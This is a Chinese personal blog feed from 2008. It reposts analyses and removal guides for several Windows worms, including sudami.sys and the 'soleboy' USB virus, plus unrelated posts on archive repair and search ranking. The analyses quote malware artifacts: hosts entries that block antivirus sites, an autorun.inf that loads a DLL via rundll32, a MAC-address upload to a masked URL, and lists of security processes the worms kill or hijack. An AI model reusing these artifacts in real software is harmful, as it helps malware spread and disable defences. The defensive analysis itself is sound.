127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 360.qihoo.com

h.向除了A,B盘之外的盘符中创建autorun.inf和system.dll(即dll??.dll),
autorun.inf内容如下：
[autorun]
shell\open\command=rundll32 system.dll,explore
shell\explore\command=rundll32 system.dll,explore
利用rundll32.exe加载该dll

i.获得本机的mac地址，操作系统版本等信息发送到http://tk123.********.cn/pk/123/count.asp

判别方法：通过sreng日志判断：
1.IFEO项目可以看到很多杀毒软件被劫持
2.查看系统服务发现如下服务的dll版本变为N/A(被病毒替换所致)
如[Application Management / AppMgmt][Stopped/Manual Start]
%SystemRoot%\System32\appmgmts.dll>
[Task Scheduler / Schedule][Stopped/Auto Start]
%SystemRoot%\system32\schedsvc.dll>
[System Restore Service / srservice][Stopped/Auto Start]
C:\WINDOWS\system32\srsvc.dll>
[Windows Image Acquisition (WIA) / stisvc][Stopped/Manual Start]
%SystemRoot%\system32\wiaservc.dll>
[Windows Time / W32Time][Stopped/Auto Start]
C:\WINDOWS\system32\w32time.dll>

解决方法：
下载sreng工具,XDelbox工具。
1.断开网络，开始—运行—输入services.msc，把下列服务设置为“禁用”：Application Management，Task Scheduler，System Restore Service，Windows Image Acquisition (WIA)，Windows Time

2.使用Xdelbox删除如下文件
%temp%\dll???.dll（???代表随机数字）
%SystemRoot%\System32\Nskhelper2.sys
%SystemRoot%\System32\NSPASS?.sys (?代表数字，不止一个)
%SystemRoot%\System32\appwinproc.dll
以及各个分区下面的system.dll,autorun.inf文件

3.重启计算机，打开我的电脑>>菜单栏>>工具>>文件夹选项>>查看
选择显示所有文件和文件夹，并把隐藏受保护的操作系统文件的钩去掉。

4.打开%SystemRoot%\system32\dllcache文件夹依次找到
schedsvc.dll
appmgmts.dll
srsvc.dll
w32time.dll
wiaservc.dll
文件
分别覆盖掉%SystemRoot%\system32\schedsvc.dll
%SystemRoot%\System32\appmgmts.dll
%SystemRoot%\System32\srsvc.dll
%SystemRoot%\System32\w32time.dll
%SystemRoot%\system32\wiaservc.dll
5.使用sreng删除所有IFEO映像劫持项目

6.使用杀毒软件全盘杀毒清除其他木马和病毒

网络找到的另外一解决方法：

手动删除病毒

a)删除文件（使用顽固文件删除工具才可以删除）

%sys32dir%\Nskhelper2.sys

%sys32dir%\appwinproc.dll

%sys32dir%\NsPass0.sys

%sys32dir%\NsPass1.sys

%sys32dir%\NsPass2.sys

%sys32dir%\NsPass3.sys

%sys32dir%\NsPass4.sys

每个驱动器下，存在autorun.inf和对应的system.dll

b)从dllcache目录下修复系统文件。

%sys32dir%\schedsvc.dll

%sys32dir%\appmgmts.dll

%sys32dir%\srsvc.dll

%sys32dir%\w32time.dll

%sys32dir%\wiaservc.dll

c)删除注册表

HKLM\SYSTEM\CurrentControlSet\Services\NsRk1

“ImagePath” "\??\C:\WINDOWS\system32\Nskhelper2.sys"

HKLM\SYSTEM\CurrentControlSet\Services\NsPsDk00

“ImagePath” "\??\C:\WINDOWS\system32\NsPass0.sys"

HKLM\SYSTEM\CurrentControlSet\Services\NsPsDk01

“ImagePath” "\??\C:\WINDOWS\system32\NsPass1.sys"

HKLM\SYSTEM\CurrentControlSet\Services\NsPsDk02

“ImagePath” "\??\C:\WINDOWS\system32\NsPass2.sys"

HKLM\SYSTEM\CurrentControlSet\Services\NsPsDk03

“ImagePath” "\??\C:\WINDOWS\system32\NsPass3.sys"

HKLM\SYSTEM\CurrentControlSet\Services\NsPsDk04

“ImagePath” "\??\C:\WINDOWS\system32\NsPass4.sys"

d)修复映像劫持。

e)清除%temp%目录。

f)修复hosts文件。

本文病毒分析来自清新阳光，第二种杀毒方法出自铁军
Tags - 杀毒 , 安全 , 技巧

Worm.Win32.AutoRun.dbp(sudami.sys)病毒分析与解决方案

Tue, 25 Nov 2008 12:00:11 +0000

病毒名称：Worm.Win32.AutoRun.dbp
　　病毒类型：蠕虫
　　文件MD5：A1AF3D5C37035B3D0AC5969F01FD0C7A
　　公开范围：完全公开
　　文件长度：85,504 字节
　　感染系统：Windows98以上版本
　　开发工具：Microsoft Visual C++
　　加壳类型：ASPack 2.12 -> Alexey Solodovnikov
　　病毒描述：该病毒为蠕虫类病毒，病毒运行后，获取KERNEL32.DLL基址，动态获取API函数、创建一个：Height=1 Width=1的对话框，判断%system32%\Drivers目录下是否存在"sudami.sys"，如存在则将其删除并从新创建一个同名的文件到该目录下，并将文件属性设置为隐藏，修改进程权限、创建注册表病毒服务、获取ntdll.dll基址，动态获取内核函数，使用内核函数ZwLoadDriver加载病毒驱动，创建病毒驱动设备名："\\.\sudami"，调用API函数打开一个网页链接，将创建的对话框设置为最小化，调用函数向该对话框传递消息，驱动文件主要行为：5ms一次遍历多款安全软件进程，如发现就结束掉。
　　行为分析－本地行为
　　1、获取KERNEL32.DLL基址，动态获取API函数、CreateDialogParamA创建一个MoveWindow:Height = 1 Width = 1的对话框，判断%system32%\Drivers目录下是否存在"sudami.sys"，如存在则将其删除并从新创建一个同名的文件到该目录下，并将文件属性设置为隐藏。
　　2、文件运行后会释放以下文件
　　%system32%\Drivers\sudami.sys
　　3、修改进程权限、获取ntdll.dll基址，动态获取内核函数，使用内核函数ZwLoadDriver加载病毒驱动，创建病毒驱动设备名："\\.\sudami"，调用API函数ShellExecuteA打开一个网页，将创建的对话框设置为最小化，调用函数向该对话框传递消息。
　　4、驱动文件主要行为：5ms一次遍历多款安全软件进程，如发现就结束掉，被遍历的安全软件进程及名字有：

　　KvXP.kxp、KVSrvXP.exe、KVwsc.exe、KVMonXP.kxp、KAVSvcUI.exe、KAVPFW.EXE、KAV32.exe、KAVsvc.exe、AVPM.EXE、AVPCC.EXE、AVP32.EXE、AVP.EXE、RAVmonD.exe、RAVmon.exe、RAVtimer.exe、Rising.exe、Rav.exe、360Safe.exe、360tray.exe、HijackThis.exe、THGUARD.EXE、PFW.EXE 、ZONEALARM.EXE、VSHWIN32.EXE、TBSCAN.EXE、SWEEP95.EXE、SMC.EXE、NMAIN.EXE、LUALL.EXE、ICMON.EXE、APVXDWIN.EXE
　　5、创建注册表病毒服务
　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sudami\ImagePath
　　值: 字符串: "system32\DRIVERS\sudami.sys."
　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sudami\Start
　　值: DWORD: 3 (0x3)
　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sudami\Type
　　值: DWORD: 1 (0x1)
　　行为分析-网络行为
　　连接网络打开链接：http://hi.b****.com/sudami
　　注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
　　%Windir% WINDODWS所在目录
　　%DriveLetter% 逻辑驱动器根目录
　　%ProgramFiles% 系统程序默认安装目录
　　%HomeDrive% 当前启动的系统的所在分区
　　%Documents and Settings% 当前用户文档根目录
　　%Temp% \Documents and Settings\当前用户\Local Settings\Temp
　　%System32% 系统的 System32文件夹
　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　windows95/98/me中默认的安装路径是C:\Windows\System
　　windowsXP中默认的安装路径是C:\Windows\System32
　　清除方案
　　手工清除请按照行为分析删除对应文件，恢复相关系统设置。推荐使用ATool管理工具。
　　请点击下载
　　（1）使用ATOOL“进程管理”关闭病毒进程。
　　（2）使用ATOOL工具“文件管理“按路径查找并删除以下文件：
　　%system32%\Drivers\sudami.sys
　　（3）删除病毒创建的注册表项：
　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sudami
　　删除Services键下的sudami键值

From：麦田守望者
Tags - 杀毒 , 技巧 , 安全

没下载完成的zip(rar)压缩文件的提取文件方法

Sun, 23 Nov 2008 02:45:19 +0000

好多次碰到下载rar等的压缩包下载不完，最后尝试数次不能下载，最后也没想过要修复提取什么的，某天泡网看到一方法，下面收录了放出来，希望能帮到其他的朋友，嘎嘎。

方法：

用WinRAR软件修复
　　①打开WinRAR，从地址列表中选中已损坏的ZIP(rar)文件。然后用鼠标点击工具栏上的“修复”，在弹出的对话框中选择修复后文件的存放路径。

　　②选择好路径后，点击“确定”，WinRAR就开始修复受损的ZIP(rar)文件，并显示修复的全过程。

　　③单击“关闭”按钮，进入修复文件的存放目录，你会发现在该目录下新增了一个“_reconst.rar”或“_reconst.zip(rar)”文件，它就是修复好了的文件。

解压缩。。看看是不是有很多文件都OK了。。。

From：teyqiu's BLOG
Tags - 技巧 , 生活

“小狗上学”病毒分析与解决

Thu, 20 Nov 2008 12:06:30 +0000

作者：清新阳光 ( http://hi.baidu.com/newcenturysun)
日期：2008/03/29 (转载请保留此声明)

PS：在某人blog发现此病毒分析文章，因为病毒有点早了，但是分析中写到的部分病毒运行方式的技巧不可多得，于是收藏学习，也许还会帮到某人捏。O(∩_∩)O

这是一个使用VB编写的病毒。可以通过U盘等移动存储传播。修改可执行文件图标，映像劫持杀毒软件...

1.病毒启动后，释放如下文件或者副本
%systemroot%\system32\soleboy.exe
%systemroot%\system32\soleboy.txt

各个分区根目录下生成soleboy.exe和autorun.inf达到随移动存储传播的目的。

2.试图结束一些安全工具的进程
比如procexp.exe
U盘病毒免疫器
avgnt.exe
Psview.exe
PowerRmv.exe
ToolsLoader.exe
FrameworkService.exe
...

3.映像劫持如下杀毒软件和安全工具：
360Safe.exe
360tray.exe
ACAAS.exe
ACAEGMgr.exe
ACAIS.exe
ACALS.exe
ACASP.exe
ACenter.exe
AFMain.exe
AGB6.EXE
AGBKrnl.exe
AhnSD.exe
AhnSDsv.exe
AluSchedulerSvc.exe
AScheduleService.exe
AST.exe
avcenter.exe
avgnt.exe
avguard.exe
CCenter.exe
ccSvcHst.exe
FilMsg.exe
FrameworkService.exe
KASMain.exe
KAV32.exe
KVIETools.exe
kvsrvxp.exe
KWatch.exe
mcconsol.exe
Mcshield.exe
MPMain.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
MSProxy.ahn
naPrdMgr.exe
nod32krn.exe
nod32kui.exe
PCCIOMON.EXE
PCCVScan.exe
PCMAIN.EXE
PowerRmv.exe
psview.exe
Rav.exe
RavMonD.exe
sched.exe
sessmgr.exe
shstat.exe
SnipeSword.exe
TRIALMSG.exe
Twister.exe
vcn.exe
vcs.exe
vcw.exe
VsTskMgr.exe
劫持到%systemroot%\system32\soleboy.exe

4.添加注册表启动项目HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\soleboy: "%systemroot%\system32\soleboy.exe"达到开机启动自身的目的

5.修改com和exe文件的文件关联指向soleboy.exe
HKLM\SOFTWARE\Classes\comfile\shell\open\command\: "soleboy.exe "%1" %*"
HKLM\SOFTWARE\Classes\exefile\shell\open\command\: "soleboy.exe "%1" %*"

6.修改exe的图标关联指向soleboy.exe，使得所有exe图标变成小狗图案。
HKEY_CLASSES_ROOT\exefile\DefaultIcon: "soleboy.exe"

7.查找带有如下字样的窗口，找到后利用sendmessage函数发送WM_CLOSE命令关闭窗口
瑞星反病毒资讯网 [信息安全源自瑞星] - Windows Internet Explorer
Windows 任务管理器
注册表编辑器
江民进程查看器
欢迎光临江民科技[网络安全，选择江民] - Windows Internet Explorer
金山毒霸信息安全网－免费下载杀毒软件 - Windows Internet Explorer
卡巴斯基实验室: 反病毒软件,反间谍程序,垃圾邮件过滤 - Windows Internet Explorer
360安全卫士－Windows Internet Explorer
防病毒、反间谍软件、端点安全、备份、存储和遵从解决方案－赛门铁克公司－Windows Internet Explorer
大型企业 - 趋势科技中国 - Windows Internet Explorer
东方微点 - Windows Internet Explorer
...

8 删除%systemroot%\system32\taskkill.exe

9.作者在soleboy.txt中写道：

I want to go to university.
I think Jiangmin Antivirus Software is the best security software!
Don't worry ,I won't destroy your data.

解决方法：
下载sreng，Icesword
sreng:http://www.skycn.com/soft/23312.html#download
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip

已经安装winrar的请打开winrar的安装路径找到winrar.exe 把他改名为winrar.bat双击运行

然后单击winrar菜单栏“文件”按钮打开压缩文件

分别解压sreng和Icesword

1.把Icesword.exe改名为1.bat运行
打开Icesword－进程
结束soleboy.exe进程

2.同样方法解压sreng
把srengps.exe改名为 2.bat运行
启动项目注册表
删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[Soleboy]
并删除所有红色的IFEO项目

系统修复文件关联点击“修复”按钮

3.开始运行输入regedit
展开HKEY_CLASSES_ROOT\exefile\DefaultIcon 修改该项数据为"%1" （不包括引号）

Tags - 技巧 , 杀毒 , 安全

极度郁闷，blog被谷歌K了

Mon, 27 Oct 2008 05:20:31 +0000

这段时间挺忙的，也没顾上时间写东西，没时间打理blog，昨天上去一看谷歌广告的点击情况惊奇坏了，一看流量统计差点没晕过去，是以前的百分之一左右，怎么会这样的，查详细的情况发现谷歌带来的流量几乎是没的，速度的去站长工具那查查收录情况和GR，彻底晕了。

看着以前是3的GR值现在被降为0，彻底无语。看看收录情况这明显是被谷歌给K了，可是想想我的站也没什么明显禁止的东西，百度的到是没这类情况，去查查原因，具别人说谷歌一般不会K个人站点，何况我的只是小blog而已，去翻翻blog的后台看有没的什么问题，在插件那一栏看到googleping的字样，记得好像这是官方论坛发出的一个插件，我知道的还算早，该插件安装好以后，在发布日志的同时会使用google blogsearch的API接口向其发送ping消息，在大约5分钟内，google spider即会来抓取页面，10分钟内会同步至google的数据库，也就是说在10分钟内，一篇新的日志就会被收录，对seo来说是非常实用的插件，，汗，就是没想到这点，估计被当作是作弊了，想想小blog也真是多灾多难的，刚开始用的免费的cn玉米，GR到了3的时候到期了，自己也不想用了，因为续费太贵，跟国际玉米一个价格，想想自己也不是为赚钱的，不需要在乎，再说好像换了玉米GR也是可以更新的，后来换了也没更新，过了两个月左右的成了2，后来又成了3，现在被降为0，真是郁闷，没的搜索引擎的流量，这类的小blog几乎流量不多，当然广告也就没什么了，虽然还有百度大叔在，还是不成，想想也郁闷，打算从今天起先撤下所有的广告，包括谷歌和百度的，可以减轻主机的负担，加快浏览速度。在想办法让谷歌解封吧，不知道成不成功了，汗！
日志写完一个小时后我找到了google的站长工具那里已经将使用插件的情况说明，请求重新审核，汗，不知道结果是怎么样的，这又是一个漫长的等待过程，希望能一切顺利吧。

Tags - 日记 , 生活